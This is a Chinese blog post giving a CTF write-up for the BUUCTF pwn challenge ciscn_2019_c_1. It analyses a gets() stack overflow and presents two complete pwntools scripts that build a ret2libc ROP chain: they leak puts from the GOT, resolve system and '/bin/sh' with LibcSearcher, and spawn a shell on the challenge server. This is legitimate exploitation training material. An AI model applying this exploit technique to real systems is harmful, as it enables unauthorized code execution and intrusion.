ciscn_2019_c_1

已于 2022-07-22 22:17:31 修改
阅读量1.4k 收藏 2
点赞数
分类专栏: 菜狗子pwn 文章标签: 网络 开发语言 pwn ctf python
于 2022-07-21 23:12:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56301399/article/details/125921327
版权

文章目录

一、查看文件

file ciscn_2019_c_1查看文件格式:

在这里插入图片描述
checksec ciscn_2019_c_1 查看文件保护:
在这里插入图片描述
64位,NX与ASLR都开启了,不白给了

二、IDA反编译

我们发现两个主要函数:
main:
在这里插入图片描述
在这里插入图片描述
encrypt():
在这里插入图片描述

然而没有发现callsystem后门函数,开了NX需要自己构造ROP链。
基本思路:encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址。

发现Get函数存在溢出点offest=0x50+8

在这里插入图片描述
我们通过Ropgadget找到pop_rdi_rdi地址:0x400c83
在这里插入图片描述

三、代码构建

exp:

from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26336)
elf=ELF("./ciscn_2019_c_1")
ret=0x400c83
plt=elf.plt['puts']
got=elf.got['puts']
main_addr=0x400B28
r.recv()
r.sendline("1")
r.recvuntil("encrypted\n")
p=flat("a"*0x58)+p64(ret)+p64(got)+p64(plt)+p64(main_addr)
r.sendline(p)
r.recvuntil("Ciphertext\n")
r.recvuntil("\n")
addr=u64(r.recv(6).ljust(0x8,b"\x00"))
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")
print(libcbase)

Libc基址:
在这里插入图片描述

继续构建:

from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26336)
elf=ELF("./ciscn_2019_c_1")
ret=0x400c83
plt=elf.plt['puts']
got=elf.got['puts']
main_addr=0x400B28
r.recv()
r.sendline(b"1")
r.recvuntil(b"encrypted\n")
p=b"a"*0x58+p64(ret)+p64(got)+p64(plt)+p64(main_addr)
r.sendline(p)
r.recvuntil(b"Ciphertext\n")
r.recvuntil(b"\n")
addr=u64(r.recv(6).ljust(0x8,b"\x00"))
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")
print(libcbase)
r.recv()
r.sendline(b"1")
r.recvuntil(b"encrypted\n")
sys_addr=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
res=0x4006b9
p1=b"a"*0x58+p64(res)+p64(ret)+p64(bin_sh)+p64(sys_addr)
r.sendline(p1)
r.interactive()

这一步之后就可以得到flag了
直接cat flag:
在这里插入图片描述
但是我在这里遇到了这样的问题:
timeout: the monitored command dumped core
这时候他不是有很多的选择吗:
在这里插入图片描述
我们换个选择试试就可以了

总结

真就磨人呐,今天碰见三种不同题型,栓Q了。

长街395
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ciscn_2019_c_1(ret2libc)
qq_53928256的博客
10-08 749
综上,我们可以构造第一段payload为(payload首部加入‘\0’是为了绕过encrypt函数,防止输入的字符串加密而变化,strlen()函数遇‘\0’截止)故我们可以计算加载程序的基址,通过基址和各个函数以及字符串的偏移量可以计算各个函数以及字符串在程序中的地址。通过已经调用过的函数去泄露它在程序中的地址,然后利用地址末尾的3个字节,去找到该程序所用的libc版本;随后我们可以通过得到的libc版本来查询对应字符串或函数的偏移地址,也包括puts函数的偏移地址;
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 744
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
ciscn_2019_c_1[BUUCTF]
最新发布
moonlightsunshin的博客
05-03 517
但是程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露出libc基址构造payload来泄露libc。在amd64架构下参数通过rdi传递0x400c83就是我们需要pop_rdi的地址。拿到题先三板斧hecksec --file=ciscn_2019_c_1看保护。开启了NX优先考虑ROP但是关闭了PIE则可能存在缓冲区溢出。查看堆栈窗口得到缓冲区大小 构造0x50+0x8即可溢出。得到 /bin/sh的地址。发现gets函数存在溢出。如果不行就换一个libc。
ciscn_2019_c_1【BUUCTF
qq_41696518的博客
08-26 996
ciscn_2019_c_1【BUUCTF
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 200
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
ciscn_2021_lonelywolf.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1260
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 494
Buu CTF PWNciscn_2019_c_1的WriteUp
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 243
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
[BUUCTF]ciscn_2019_c_1 1
weixin_55013445的博客
10-01 163
可知,该程序开启了NX(栈不可执行)保护再使用IDA进行反汇编对代码进行分析可知,漏洞点在encrypt()函数的gets()上到此,思路明确,我们可以通过gets()的栈溢出漏洞,获取libc的基地址,接着通过libc的基地址获取system和str_bin_sh的地址,最后执行system(“/bin/sh”)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值